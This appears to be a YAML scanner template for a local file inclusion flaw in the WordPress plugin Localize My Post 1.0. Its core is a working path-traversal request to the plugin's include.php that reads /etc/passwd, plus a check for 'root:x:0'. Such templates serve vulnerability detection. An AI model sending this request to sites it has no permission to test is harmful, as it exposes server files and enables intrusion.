product: WordPress
vName: WordPress Plugin Localize My Post 1.0 - Local File Inclusion
type: 文件读取
vID: [ ]
level: 3
vDesc: ''
version: ''
note: ''
search: { }
protocol: http
link: https://www.exploit-db.com/exploits/45439
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
    verify:
      logic: and
      check:
        - body:
            value:
              - 'root:x:0'
            logic: and
